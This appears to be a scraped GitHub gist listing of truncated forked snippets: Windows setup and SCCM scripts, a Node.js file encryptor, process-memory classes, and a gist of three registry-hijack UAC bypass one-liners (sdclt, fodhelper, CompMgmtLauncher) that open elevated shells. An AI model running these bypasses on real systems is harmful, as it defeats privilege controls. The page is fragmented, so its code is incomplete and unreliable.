Skip to content

Instantly share code, notes, and snippets.

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
public partial class StoredProcedures
{
[StructLayout(LayoutKind.Sequential)]
// if your body matches what your eyes could do, you'd probably move right through
// me on my waaaaaaaay to you.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
public partial class StoredProcedures
@decay88
decay88 / reclaimWindows10.ps1
Created March 29, 2019 17:26 — forked from alirobe/reclaimWindows10.ps1
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
##########
# Tweaked Win10 Initial Setup Script
# Primary Author: Disassembler <disassembler@dasm.cz>
# Modified by: alirobe <alirobe@alirobe.com> based on my personal preferences.
# Version: 2.20.2, 2018-09-14
# Primary Author Source: https://github.com/Disassembler0/Win10-Initial-Setup-Script
# Tweaked Source: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1/
# Tweak difference:
#
# @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ...
@decay88
decay88 / SCCM-cycles.ps1
Created March 4, 2019 12:55 — forked from jlzimmer/Run-SCCMcycles.ps1
Runs SCCM collection cycles on a target machine. Execute the self-elevating .cmd wrapper file to invoke the .ps1 script.
# Runs Configuration Manager cycles on a target machine.
function Invoke-SCCMCycles {
[Parameter(Mandatory=$true,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)]
[string]$Client = @($env:COMPUTERNAME)
Write-Output($Client)
[string[]]$IDs = @("{00000000-0000-0000-0000-000000000121}", # Application Deployment Evaluation
@decay88
decay88 / .cmd
Created March 4, 2019 11:50 — forked from xillwillx/.cmd
UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting
**UAC bypass for Win10:**
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
**UAC bypass for Win10:**
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f
**UAC bypass for 7/8/10:**
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
/*
Change Log:
v1.12 (2017-01-18) - Fixed OnExit not exiting
v1.11 (2017-01-17) - Added an internal function Ensure_Admin_And_Compiled()
v1.10 (2015-10-22) - Added support for sending characters that needs to press {shift} key, such as "@" or "A".
v1.00 (2015-07-25)
Dependency files:
WinRing0_v1.3.1.19.zip -- https://drive.google.com/file/d/0B7yNOlCgfluzMTE2UFc2ZHp5Z1E/view?usp=sharing
@decay88
decay88 / WeaponizedPyObject.cs
Created February 20, 2019 06:23 — forked from disruptek/WeaponizedPyObject.cs
An extremely dangerous extension of PyObject
/* A weaponized version of PyObject.
*
* This code violates multiple tenets of the Geneva Conventions[0]
* the Kyoto Protocol, the United Nations Charter, the Ottawa Treaty,
* the Roerich Pact, both the first and second London Naval Treaties,
* the St. Petersburg Declaration, and the Nuremberg Priciples. It
* may be even run afoul of a few loosely-interpreted sections of the
* Paris Climate Accord due to ambiguity in the Farsi translation[1].
*
* As such, users may be deemed a terrorist threat in (at time of
@decay88
decay88 / encrypto.js
Created February 20, 2019 06:11 — forked from luludotdev/encrypto.js
Simple Node.js File Encryption
const fs = require('fs')
const { createReadStream, createWriteStream } = fs
const { createGzip, createGunzip } = require('zlib')
const { createCipheriv, createDecipheriv, randomBytes, createHash } = require('crypto')
const ENC_ALGO = 'aes-256-cbc'
const IV_LEN = 16
/**
* @param {string} password Key
@decay88
decay88 / ProcessMemory
Created February 13, 2019 12:30 — forked from Konctantin/ProcessMemory
ProcessMemory
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace NetCallerFunc
@decay88
decay88 / ProcessMemory.cs
Created February 13, 2019 12:30 — forked from Konctantin/ProcessMemory.cs
Process memory class for x64
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace CallFsEB
{